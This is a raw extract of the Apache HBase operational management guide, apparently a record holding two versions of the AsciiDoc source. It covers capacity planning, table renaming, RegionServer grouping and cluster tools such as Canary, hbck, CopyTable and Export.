5-15Mb\/s per RS can be expected, since every region server has only one active WAL.\nThere's no good estimate for reads, as it depends vastly on data, requests, and cache hit rate. <<perf.casestudy,perf.casestudy>> might be helpful.\n\n[[ops.capacity.nodes.gc]]\n==== JVM GC limitations\n\nRS cannot currently utilize very large heap due to cost of GC.\nThere's also no good way of running multiple RS-es per server (other than running several VMs per machine). Thus, ~20-24Gb or less memory dedicated to one RS is recommended.\nGC tuning is required for large heap sizes.\nSee <<gcpause,gcpause>>, <<trouble.log.gc,trouble.log.gc>> and elsewhere (TODO: where?)\n\n[[ops.capacity.regions]]\n=== Determining region count and size\n\nGenerally less regions makes for a smoother running cluster (you can always manually split the big regions later (if necessary) to spread the data, or request load, over the cluster); 20-200 regions per RS is a reasonable range.\nThe number of regions cannot be configured directly (unless you go for fully <<disable.splitting,disable.splitting>>); adjust the region size to achieve the target region size given table size.\n\nWhen configuring regions for multiple tables, note that most region settings can be set on a per-table basis via link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HTableDescriptor.html[HTableDescriptor], as well as shell commands.\nThese settings will override the ones in `hbase-site.xml`.\nThat is useful if your tables have different workloads\/use cases.\n\nAlso note that in the discussion of region sizes here, _HDFS replication factor is not (and should not be) taken into account, whereas\n other factors <<ops.capacity.nodes.datasize,ops.capacity.nodes.datasize>> should be._ So, if your data is compressed and replicated 3 ways by HDFS, \"9 Gb region\" means 9 Gb of compressed data.\nHDFS replication factor only affects your disk usage and is invisible to most HBase code.\n\n==== Viewing the Current Number of Regions\n\nYou can view the current number of regions for a given table using the HMaster UI.\nIn the [label]#Tables# section, the number of online regions for each table is listed in the [label]#Online Regions# column.\nThis total only includes the in-memory state and does not include disabled or offline regions.\nIf you do not want to use the HMaster UI, you can determine the number of regions by counting the number of subdirectories of the \/hbase\/<table>\/ subdirectories in HDFS, or by running the `bin\/hbase hbck` command.\nEach of these methods may return a slightly different number, depending on the status of each region.\n\n[[ops.capacity.regions.count]]\n==== Number of regions per RS - upper bound\n\nIn production scenarios, where you have a lot of data, you are normally concerned with the maximum number of regions you can have per server. <<too_many_regions,too many regions>> has technical discussion on the subject.\nBasically, the maximum number of regions is mostly determined by memstore memory usage.\nEach region has its own memstores; these grow up to a configurable size; usually in 128-256 MB range, see <<hbase.hregion.memstore.flush.size,hbase.hregion.memstore.flush.size>>.\nOne memstore exists per column family (so there's only one per region if there's one CF in the table). The RS dedicates some fraction of total memory to its memstores (see <<hbase.regionserver.global.memstore.size,hbase.regionserver.global.memstore.size>>). If this memory is exceeded (too much memstore usage), it can cause undesirable consequences such as unresponsive server or compaction storms.\nA good starting point for the number of regions per RS (assuming one table) is:\n\n[source]\n----\n((RS memory) * (total memstore fraction)) \/ ((memstore size)*(# column families))\n----\n\nThis formula is pseudo-code.\nHere are two formulas using the actual tunable parameters, first for HBase 0.98+ and second for HBase 0.94.x.\n\nHBase 0.98.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.size) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\nHBase 0.94.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.upperLimit) \/ (hbase.hregion.memstore.flush.size * (# column families))+\n----\n\nIf a given RegionServer has 16 GB of RAM, with default settings, the formula works out to 16384*0.4\/128 ~ 51 regions per RS is a starting point.\nThe formula can be extended to multiple tables; if they all have the same configuration, just use the total number of families.\n\nThis number can be adjusted; the formula above assumes all your regions are filled at approximately the same rate.\nIf only a fraction of your regions are going to be actively written to, you can divide the result by that fraction to get a larger region count.\nThen, even if all regions are written to, all region memstores are not filled evenly, and eventually jitter appears even if they are (due to limited number of concurrent flushes). Thus, one can have as many as 2-3 times more regions than the starting point; however, increased numbers carry increased risk.\n\nFor write-heavy workload, memstore fraction can be increased in configuration at the expense of block cache; this will also allow one to have more regions.\n\n[[ops.capacity.regions.mincount]]\n==== Number of regions per RS - lower bound\n\nHBase scales by having regions across many servers.\nThus if you have 2 regions for 16GB data, on a 20 node machine your data will be concentrated on just a few machines - nearly the entire cluster will be idle.\nThis really can't be stressed enough, since a common problem is loading 200MB data into HBase and then wondering why your awesome 10 node cluster isn't doing anything.\n\nOn the other hand, if you have a very large amount of data, you may also want to go for a larger number of regions to avoid having regions that are too large.\n\n[[ops.capacity.regions.size]]\n==== Maximum region size\n\nFor large tables in production scenarios, maximum region size is mostly limited by compactions - very large compactions, esp.\nmajor, can degrade cluster performance.\nCurrently, the recommended maximum region size is 10-20Gb, and 5-10Gb is optimal.\nFor older 0.90.x codebase, the upper-bound of regionsize is about 4Gb, with a default of 256Mb.\n\nThe size at which the region is split into two is generally configured via <<hbase.hregion.max.filesize,hbase.hregion.max.filesize>>; for details, see <<arch.region.splits,arch.region.splits>>.\n\nIf you cannot estimate the size of your tables well, when starting off, it's probably best to stick to the default region size, perhaps going smaller for hot tables (or manually split hot regions to spread the load over the cluster), or go with larger region sizes if your cell sizes tend to be largish (100k and up).\n\nIn HBase 0.98, experimental stripe compactions feature was added that would allow for larger regions, especially for log data.\nSee <<ops.stripe,ops.stripe>>.\n\n[[ops.capacity.regions.total]]\n==== Total data size per region server\n\nAccording to above numbers for region size and number of regions per region server, in an optimistic estimate 10 GB x 100 regions per RS will give up to 1TB served per region server, which is in line with some of the reported multi-PB use cases.\nHowever, it is important to think about the data vs cache size ratio at the RS level.\nWith 1TB of data per server and 10 GB block cache, only 1% of the data will be cached, which may barely cover all block indices.\n\n[[ops.capacity.config]]\n=== Initial configuration and tuning\n\nFirst, see <<important_configurations,important configurations>>.\nNote that some configurations, more than others, depend on specific scenarios.\nPay special attention to:\n\n* <<hbase.regionserver.handler.count,hbase.regionserver.handler.count>> - request handler thread count, vital for high-throughput workloads.\n* <<config.wals,config.wals>> - the blocking number of WAL files depends on your memstore configuration and should be set accordingly to prevent potential blocking when doing high volume of writes.\n\nThen, there are some considerations when setting up your cluster and tables.\n\n[[ops.capacity.config.compactions]]\n==== Compactions\n\nDepending on read\/write volume and latency requirements, optimal compaction settings may be different.\nSee <<compaction,compaction>> for some details.\n\nWhen provisioning for large data sizes, however, it's good to keep in mind that compactions can affect write throughput.\nThus, for write-intensive workloads, you may opt for less frequent compactions and more store files per regions.\nMinimum number of files for compactions (`hbase.hstore.compaction.min`) can be set to higher value; <<hbase.hstore.blockingStoreFiles,hbase.hstore.blockingStoreFiles>> should also be increased, as more files might accumulate in such case.\nYou may also consider manually managing compactions: <<managed.compactions,managed.compactions>>\n\n[[ops.capacity.config.presplit]]\n==== Pre-splitting the table\n\nBased on the target number of the regions per RS (see <<ops.capacity.regions.count,ops.capacity.regions.count>>) and number of RSes, one can pre-split the table at creation time.\nThis would both avoid some costly splitting as the table starts to fill up, and ensure that the table starts out already distributed across many servers.\n\nIf the table is expected to grow large enough to justify that, at least one region per RS should be created.\nIt is not recommended to split immediately into the full target number of regions (e.g.\n50 * number of RSes), but a low intermediate value can be chosen.\nFor multiple tables, it is recommended to be conservative with presplitting (e.g.\npre-split 1 region per RS at most), especially if you don't know how much each table will grow.\nIf you split too much, you may end up with too many regions, with some tables having too many small regions.\n\nFor pre-splitting howto, see <<manual_region_splitting_decisions,manual region splitting decisions>> and <<precreate.regions,precreate.regions>>.\n\n[[table.rename]]\n== Table Rename\n\nIn versions 0.90.x of hbase and earlier, we had a simple script that would rename the hdfs table directory and then do an edit of the hbase:meta table replacing all mentions of the old table name with the new.\nThe script was called `.\/bin\/rename_table.rb`.\nThe script was deprecated and removed mostly because it was unmaintained and the operation performed by the script was brutal.\n\nAs of hbase 0.94.x, you can use the snapshot facility renaming a table.\nHere is how you would do it using the hbase shell:\n\n----\nhbase shell> disable 'tableName'\nhbase shell> snapshot 'tableName', 'tableSnapshot'\nhbase shell> clone_snapshot 'tableSnapshot', 'newTableName'\nhbase shell> delete_snapshot 'tableSnapshot'\nhbase shell> drop 'tableName'\n----\n\nor in code it would be as follows:\n\n[source,java]\n----\nvoid rename(Admin admin, String oldTableName, TableName newTableName) {\n String snapshotName = randomName();\n admin.disableTable(oldTableName);\n admin.snapshot(snapshotName, oldTableName);\n admin.cloneSnapshot(snapshotName, newTableName);\n admin.deleteSnapshot(snapshotName);\n admin.deleteTable(oldTableName);\n}\n----\n\n[[rsgroup]]\n== RegionServer Grouping\nRegionServer Grouping (A.K.A `rsgroup`) is an advanced feature for\npartitioning regionservers into distinctive groups for strict isolation. It\nshould only be used by users who are sophisticated enough to understand the\nfull implications and have a sufficient background in managing HBase clusters.\nIt was developed by Yahoo! and they run it at scale on their large grid cluster.\nSee link:http:\/\/www.slideshare.net\/HBaseCon\/keynote-apache-hbase-at-yahoo-scale[HBase at Yahoo! Scale].\n\nRSGroups can be defined and managed with shell commands or corresponding Java\nAPIs. A server can be added to a group with hostname and port pair and tables\ncan be moved to this group so that only regionservers in the same rsgroup can\nhost the regions of the table. RegionServers and tables can only belong to one\nrsgroup at a time. By default, all tables and regionservers belong to the\n`default` rsgroup. System tables can also be put into a rsgroup using the regular\nAPIs. A custom balancer implementation tracks assignments per rsgroup and makes\nsure to move regions to the relevant regionservers in that rsgroup. The rsgroup\ninformation is stored in a regular HBase table, and a zookeeper-based read-only\ncache is used at cluster bootstrap time.\n\nTo enable, add the following to your hbase-site.xml and restart your Master:\n\n[source,xml]\n----\n <property>\n <name>hbase.coprocessor.master.classes<\/name>\n <value>org.apache.hadoop.hbase.rsgroup.RSGroupAdminEndpoint<\/value>\n <\/property>\n <property>\n <name>hbase.master.loadbalancer.class<\/name>\n <value>org.apache.hadoop.hbase.rsgroup.RSGroupBasedLoadBalancer<\/value>\n <\/property>\n----\n\nThen use the shell _rsgroup_ commands to create and manipulate RegionServer\ngroups: e.g. to add a rsgroup and then add a server to it. To see the list of\nrsgroup commands available in the hbase shell type:\n\n[source, bash]\n----\n hbase(main):008:0> help \u2018rsgroup\u2019\n Took 0.5610 seconds\n----\n\nHigh level, you create a rsgroup that is other than the `default` group using\n_add_rsgroup_ command. You then add servers and tables to this group with the\n_move_servers_rsgroup_ and _move_tables_rsgroup_ commands. If necessary, run\na balance for the group if tables are slow to migrate to the groups dedicated\nserver with the _balance_rsgroup_ command (Usually this is not needed). To\nmonitor effect of the commands, see the `Tables` tab toward the end of the\nMaster UI home page. If you click on a table, you can see what servers it is\ndeployed across. You should see here a reflection of the grouping done with\nyour shell commands. View the master log if issues.\n\nHere is example using a few of the rsgroup commands. To add a group, do as follows:\n\n[source, bash]\n----\n hbase(main):008:0> add_rsgroup 'my_group'\n Took 0.5610 seconds\n----\n\n\n.RegionServer Groups must be Enabled\n[NOTE]\n====\nIf you have not enabled the rsgroup Coprocessor Endpoint in the master and\nyou run the any of the rsgroup shell commands, you will see an error message\nlike the below:\n\n[source,java]\n----\nERROR: org.apache.hadoop.hbase.exceptions.UnknownProtocolException: No registered master coprocessor service found for name RSGroupAdminService\n at org.apache.hadoop.hbase.master.MasterRpcServices.execMasterService(MasterRpcServices.java:604)\n at org.apache.hadoop.hbase.shaded.protobuf.generated.MasterProtos$MasterService$2.callBlockingMethod(MasterProtos.java)\n at org.apache.hadoop.hbase.ipc.RpcServer.call(RpcServer.java:1140)\n at org.apache.hadoop.hbase.ipc.CallRunner.run(CallRunner.java:133)\n at org.apache.hadoop.hbase.ipc.RpcExecutor$Handler.run(RpcExecutor.java:277)\n at org.apache.hadoop.hbase.ipc.RpcExecutor$Handler.run(RpcExecutor.java:257)\n----\n====\n\nAdd a server (specified by hostname + port) to the just-made group using the\n_move_servers_rsgroup_ command as follows:\n\n[source, bash]\n----\n hbase(main):010:0> move_servers_rsgroup 'my_group',['k.att.net:51129']\n----\n\n.Hostname and Port vs ServerName\n[NOTE]\n====\nThe rsgroup feature refers to servers in a cluster with hostname and port only.\nIt does not make use of the HBase ServerName type identifying RegionServers;\ni.e. hostname + port + starttime to distinguish RegionServer instances. The\nrsgroup feature keeps working across RegionServer restarts so the starttime of\nServerName -- and hence the ServerName type -- is not appropriate.\nAdministration\n====\n\nServers come and go over the lifetime of a Cluster. Currently, you must\nmanually align the servers referenced in rsgroups with the actual state of\nnodes in the running cluster. What we mean by this is that if you decommission\na server, then you must update rsgroups as part of your server decommission\nprocess removing references.\n\nBut, there is no _remove_offline_servers_rsgroup_command you say!\n\nThe way to remove a server is to move it to the `default` group. The `default`\ngroup is special. All rsgroups, but the `default` rsgroup, are static in that\nedits via the shell commands are persisted to the system `hbase:rsgroup` table.\nIf they reference a decommissioned server, then they need to be updated to undo\nthe reference.\n\nThe `default` group is not like other rsgroups in that it is dynamic. Its server\nlist mirrors the current state of the cluster; i.e. if you shutdown a server that\nwas part of the `default` rsgroup, and then do a _get_rsgroup_ `default` to list\nits content in the shell, the server will no longer be listed. For non-`default`\ngroups, though a mode may be offline, it will persist in the non-`default` group\u2019s\nlist of servers. But if you move the offline server from the non-default rsgroup\nto default, it will not show in the `default` list. It will just be dropped.\n\n=== Best Practice\nThe authors of the rsgroup feature, the Yahoo! HBase Engineering team, have been\nrunning it on their grid for a good while now and have come up with a few best\npractices informed by their experience.\n\n==== Isolate System Tables\nEither have a system rsgroup where all the system tables are or just leave the\nsystem tables in `default` rsgroup and have all user-space tables are in\nnon-`default` rsgroups.\n\n==== Dead Nodes\nYahoo! Have found it useful at their scale to keep a special rsgroup of dead or\nquestionable nodes; this is one means of keeping them out of the running until repair.\n\nBe careful replacing dead nodes in an rsgroup. Ensure there are enough live nodes\nbefore you start moving out the dead. Move in good live nodes first if you have to.\n\n=== Troubleshooting\nViewing the Master log will give you insight on rsgroup operation.\n\nIf it appears stuck, restart the Master process.\n\n\n\n","old_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[ops_mgt]]\n= Apache HBase Operational Management\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter will cover operational tools and practices required of a running Apache HBase cluster.\nThe subject of operations is related to the topics of <<trouble>>, <<performance>>, and <<configuration>> but is a distinct topic in itself.\n\n[[tools]]\n== HBase Tools and Utilities\n\nHBase provides several tools for administration, analysis, and debugging of your cluster.\nThe entry-point to most of these tools is the _bin\/hbase_ command, though some tools are available in the _dev-support\/_ directory.\n\nTo see usage instructions for _bin\/hbase_ command, run it with no arguments, or with the `-h` argument.\nThese are the usage instructions for HBase 0.98.x.\nSome commands, such as `version`, `pe`, `ltt`, `clean`, are not available in previous versions.\n\n----\n$ bin\/hbase\nUsage: hbase [<options>] <command> [<args>]\nOptions:\n --config DIR Configuration direction to use. Default: .\/conf\n --hosts HOSTS Override the list in 'regionservers' file\n\nCommands:\nSome commands take arguments. Pass no args or -h for usage.\n shell Run the HBase shell\n hbck Run the hbase 'fsck' tool\n wal Write-ahead-log analyzer\n hfile Store file analyzer\n zkcli Run the ZooKeeper shell\n upgrade Upgrade hbase\n master Run an HBase HMaster node\n regionserver Run an HBase HRegionServer node\n zookeeper Run a ZooKeeper server\n rest Run an HBase REST server\n thrift Run the HBase Thrift server\n thrift2 Run the HBase Thrift2 server\n clean Run the HBase clean up script\n classpath Dump hbase CLASSPATH\n mapredcp Dump CLASSPATH entries required by mapreduce\n pe Run PerformanceEvaluation\n ltt Run LoadTestTool\n version Print the version\n CLASSNAME Run the class named CLASSNAME\n----\n\nSome of the tools and utilities below are Java classes which are passed directly to the _bin\/hbase_ command, as referred to in the last line of the usage instructions.\nOthers, such as `hbase shell` (<<shell>>), `hbase upgrade` (<<upgrading>>), and `hbase thrift` (<<thrift>>), are documented elsewhere in this guide.\n\n=== Canary\n\nThere is a Canary class can help users to canary-test the HBase cluster status, with every column-family for every regions or RegionServer's granularity.\nTo see the usage, use the `--help` parameter.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -help\n\nUsage: bin\/hbase org.apache.hadoop.hbase.tool.Canary [opts] [table1 [table2]...] | [regionserver1 [regionserver2]..]\n where [opts] are:\n -help Show this help and exit.\n -regionserver replace the table argument to regionserver,\n which means to enable regionserver mode\n -daemon Continuous check at defined intervals.\n -interval <N> Interval between checks (sec)\n -e Use region\/regionserver as regular expression\n which means the region\/regionserver is regular expression pattern\n -f <B> stop whole program if first error occurs, default is true\n -t <N> timeout for a check, default is 600000 (milliseconds)\n -writeSniffing enable the write sniffing in canary\n -treatFailureAsError treats read \/ write failure as error\n -writeTable The table used for write sniffing. Default is hbase:canary\n -D<configProperty>=<value> assigning or override the configuration params\n----\n\nThis tool will return non zero error codes to user for collaborating with other monitoring tools, such as Nagios.\nThe error code definitions are:\n\n[source,java]\n----\nprivate static final int USAGE_EXIT_CODE = 1;\nprivate static final int INIT_ERROR_EXIT_CODE = 2;\nprivate static final int TIMEOUT_ERROR_EXIT_CODE = 3;\nprivate static final int ERROR_EXIT_CODE = 4;\n----\n\nHere are some examples based on the following given case.\nThere are two Table objects called test-01 and test-02, they have two column family cf1 and cf2 respectively, and deployed on the 3 RegionServers.\nsee following table.\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| RegionServer\n| test-01\n| test-02\n| rs1 | r1 | r2\n| rs2 | r2 |\n| rs3 | r2 | r1\n|===\n\nFollowing are some examples based on the previous given case.\n\n==== Canary test for every column family (store) of every region of every table\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary\n\n3\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf1 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf2 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf1 in 4ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf2 in 1ms\n...\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf1 in 5ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf2 in 3ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf1 in 31ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf2 in 8ms\n----\n\nSo you can see, table test-01 has two regions and two column families, so the Canary tool will pick 4 small piece of data from 4 (2 region * 2 store) different stores.\nThis is a default behavior of the this tool does.\n\n==== Canary test for every column family (store) of every region of specific table(s)\n\nYou can also test one or more specific tables.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary test-01 test-02\n----\n\n==== Canary test with RegionServer granularity\n\nThis will pick one small piece of data from each RegionServer, and can also put your RegionServer name as input options for canary-test specific RegionServer.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -regionserver\n\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs2 in 72ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-02 on region server:rs3 in 34ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs1 in 56ms\n----\n\n==== Canary test with regular expression pattern\n\nThis will test both table test-01 and test-02.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -e test-0[1-2]\n----\n\n==== Run canary test as daemon mode\n\nRun repeatedly with interval defined in option `-interval` whose default value is 6 seconds.\nThis daemon will stop itself and return non-zero error code if any error occurs, due to the default value of option -f is true.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon\n----\n\nRun repeatedly with internal 5 seconds and will not stop itself even if errors occur in the test.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon -interval 50000 -f false\n----\n\n==== Force timeout if canary test stuck\n\nIn some cases the request is stuck and no response is sent back to the client. This can happen with dead RegionServers which the master has not yet noticed.\nBecause of this we provide a timeout option to kill the canary test and return a non-zero error code.\nThis run sets the timeout value to 60 seconds, the default value is 600 seconds.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -t 600000\n----\n\n==== Enable write sniffing in canary\n\nBy default, the canary tool only check the read operations, it's hard to find the problem in the\nwrite path. To enable the write sniffing, you can run canary with the `-writeSniffing` option.\nWhen the write sniffing is enabled, the canary tool will create an hbase table and make sure the\nregions of the table distributed on all region servers. In each sniffing period, the canary will\ntry to put data to these regions to check the write availability of each region server.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing\n----\n\nThe default write table is `hbase:canary` and can be specified by the option `-writeTable`.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing -writeTable ns:canary\n----\n\nThe default value size of each put is 10 bytes and you can set it by the config key:\n`hbase.canary.write.value.size`.\n\n==== Treat read \/ write failure as error\n\nBy default, the canary tool only logs read failure, due to e.g. RetriesExhaustedException,\nwhile returning normal exit code. To treat read \/ write failure as error, you can run canary\nwith the `-treatFailureAsError` option. When enabled, read \/ write failure would result in error\nexit code.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary --treatFailureAsError\n----\n\n==== Running Canary in a Kerberos-enabled Cluster\n\nTo run Canary in a Kerberos-enabled cluster, configure the following two properties in _hbase-site.xml_:\n\n* `hbase.client.keytab.file`\n* `hbase.client.kerberos.principal`\n\nKerberos credentials are refreshed every 30 seconds when Canary runs in daemon mode.\n\nTo configure the DNS interface for the client, configure the following optional properties in _hbase-site.xml_.\n\n* `hbase.client.dns.interface`\n* `hbase.client.dns.nameserver`\n\n.Canary in a Kerberos-Enabled Cluster\n====\nThis example shows each of the properties with valid values.\n\n[source,xml]\n----\n<property>\n <name>hbase.client.kerberos.principal<\/name>\n <value>hbase\/_HOST@YOUR-REALM.COM<\/value>\n<\/property>\n<property>\n <name>hbase.client.keytab.file<\/name>\n <value>\/etc\/hbase\/conf\/keytab.krb5<\/value>\n<\/property>\n<!-- optional params -->\nproperty>\n <name>hbase.client.dns.interface<\/name>\n <value>default<\/value>\n<\/property>\n<property>\n <name>hbase.client.dns.nameserver<\/name>\n <value>default<\/value>\n<\/property>\n----\n====\n\n[[health.check]]\n=== Health Checker\n\nYou can configure HBase to run a script periodically and if it fails N times (configurable), have the server exit.\nSee _HBASE-7351 Periodic health check script_ for configurations and detail.\n\n=== Driver\n\nSeveral frequently-accessed utilities are provided as `Driver` classes, and executed by the _bin\/hbase_ command.\nThese utilities represent MapReduce jobs which run on your cluster.\nThey are run in the following way, replacing _UtilityName_ with the utility you want to run.\nThis command assumes you have set the environment variable `HBASE_HOME` to the directory where HBase is unpacked on your server.\n\n----\n\n${HBASE_HOME}\/bin\/hbase org.apache.hadoop.hbase.mapreduce.UtilityName\n----\n\nThe following utilities are available:\n\n`LoadIncrementalHFiles`::\n Complete a bulk data load.\n\n`CopyTable`::\n Export a table from the local cluster to a peer cluster.\n\n`Export`::\n Write table data to HDFS.\n\n`Import`::\n Import data written by a previous `Export` operation.\n\n`ImportTsv`::\n Import data in TSV format.\n\n`RowCounter`::\n Count rows in an HBase table.\n\n`CellCounter`::\n Count cells in an HBase table.\n\n`replication.VerifyReplication`::\n Compare the data from tables in two different clusters.\n WARNING: It doesn't work for incrementColumnValues'd cells since the timestamp is changed.\n Note that this command is in a different package than the others.\n\nEach command except `RowCounter` and `CellCounter` accept a single `--help` argument to print usage instructions.\n\n[[hbck]]\n=== HBase `hbck`\n\nTo run `hbck` against your HBase cluster run `$.\/bin\/hbase hbck`. At the end of the command's output it prints `OK` or `INCONSISTENCY`.\nIf your cluster reports inconsistencies, pass `-details` to see more detail emitted.\nIf inconsistencies, run `hbck` a few times because the inconsistency may be transient (e.g. cluster is starting up or a region is splitting).\n Passing `-fix` may correct the inconsistency (This is an experimental feature).\n\nFor more information, see <<hbck.in.depth>>.\n\n[[hfile_tool2]]\n=== HFile Tool\n\nSee <<hfile_tool>>.\n\n=== WAL Tools\n\n[[hlog_tool]]\n==== FSHLog tool\n\nThe main method on `FSHLog` offers manual split and dump facilities.\nPass it WALs or the product of a split, the content of the _recovered.edits_.\ndirectory.\n\nYou can get a textual dump of a WAL file content by doing the following:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --dump hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\nThe return code will be non-zero if there are any issues with the file so you can test wholesomeness of file by redirecting `STDOUT` to `\/dev\/null` and testing the program return.\n\nSimilarly you can force a split of a log file directory by doing:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --split hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/\n----\n\n[[hlog_tool.prettyprint]]\n===== WALPrettyPrinter\n\nThe `WALPrettyPrinter` is a tool with configurable options to print the contents of a WAL.\nYou can invoke it via the HBase cli with the 'wal' command.\n\n----\n $ .\/bin\/hbase wal hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\n.WAL Printing in older versions of HBase\n[NOTE]\n====\nPrior to version 2.0, the `WALPrettyPrinter` was called the `HLogPrettyPrinter`, after an internal name for HBase's write ahead log.\nIn those versions, you can print the contents of a WAL using the same configuration as above, but with the 'hlog' command.\n\n----\n $ .\/bin\/hbase hlog hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n====\n\n[[compression.tool]]\n=== Compression Tool\n\nSee <<compression.test,compression.test>>.\n\n[[copy.table]]\n=== CopyTable\n\nCopyTable is a utility that can copy part or of all of a table, either to the same cluster or another cluster.\nThe target table must first exist.\nThe usage is as follows:\n\n----\n\n$ .\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\n\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\nUsage: CopyTable [general options] [--starttime=X] [--endtime=Y] [--new.name=NEW] [--peer.adr=ADR] <tablename>\n\nOptions:\n rs.class hbase.regionserver.class of the peer cluster,\n specify if different from current cluster\n rs.impl hbase.regionserver.impl of the peer cluster,\n startrow the start row\n stoprow the stop row\n starttime beginning of the time range (unixtime in millis)\n without endtime means from starttime to forever\n endtime end of the time range. Ignored if no starttime specified.\n versions number of cell versions to copy\n new.name new table's name\n peer.adr Address of the peer cluster given in the format\n hbase.zookeeer.quorum:hbase.zookeeper.client.port:zookeeper.znode.parent\n families comma-separated list of families to copy\n To copy from cf1 to cf2, give sourceCfName:destCfName.\n To keep the same name, just give \"cfName\"\n all.cells also copy delete markers and deleted cells\n\nArgs:\n tablename Name of the table to copy\n\nExamples:\n To copy 'TestTable' to a cluster that uses replication for a 1 hour window:\n $ bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --starttime=1265875194289 --endtime=1265878794289 --peer.adr=server1,server2,server3:2181:\/hbase --families=myOldCf:myNewCf,cf2,cf3 TestTable\n\nFor performance consider the following general options:\n It is recommended that you set the following to >=100. A higher value uses more memory but\n decreases the round trip time to the server and may increase performance.\n -Dhbase.client.scanner.caching=100\n The following should always be set to false, to prevent writing data twice, which may produce\n inaccurate results.\n -Dmapred.map.tasks.speculative.execution=false\n----\n\n.Scanner Caching\n[NOTE]\n====\nCaching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n====\n\n.Versions\n[NOTE]\n====\nBy default, CopyTable utility only copies the latest version of row cells unless `--versions=n` is explicitly specified in the command.\n====\n\nSee Jonathan Hsieh's link:https:\/\/blog.cloudera.com\/blog\/2012\/06\/online-hbase-backups-with-copytable-2\/[Online\n HBase Backups with CopyTable] blog post for more on `CopyTable`.\n\n[[export]]\n=== Export\n\nExport is a utility that will dump the contents of table to HDFS in a sequence file.\nThe Export can be run via a Coprocessor Endpoint or MapReduce. Invoke via:\n\n*mapreduce-based Export*\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\n*endpoint-based Export*\n----\n$ bin\/hbase org.apache.hadoop.hbase.coprocessor.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\n*The Comparison of Endpoint-based Export And Mapreduce-based Export*\n|===\n||Endpoint-based Export|Mapreduce-based Export\n\n|HBase version requirement\n|2.0+\n|0.2.1+\n\n|Maven dependency\n|hbase-endpoint\n|hbase-mapreduce (2.0+), hbase-server(prior to 2.0)\n\n|Requirement before dump\n|mount the endpoint.Export on the target table\n|deploy the MapReduce framework\n\n|Read latency\n|low, directly read the data from region\n|normal, traditional RPC scan\n\n|Read Scalability\n|depend on number of regions\n|depend on number of mappers (see TableInputFormatBase#getSplits)\n\n|Timeout\n|operation timeout. configured by hbase.client.operation.timeout\n|scan timeout. configured by hbase.client.scanner.timeout.period\n\n|Permission requirement\n|READ, EXECUTE\n|READ\n\n|Fault tolerance\n|no\n|depend on MapReduce\n|===\n\n\nNOTE: To see usage instructions, run the command with no options. Available options include\nspecifying column families and applying filters during the export.\n\nBy default, the `Export` tool only exports the newest version of a given cell, regardless of the number of versions stored. To export more than one version, replace *_<versions>_* with the 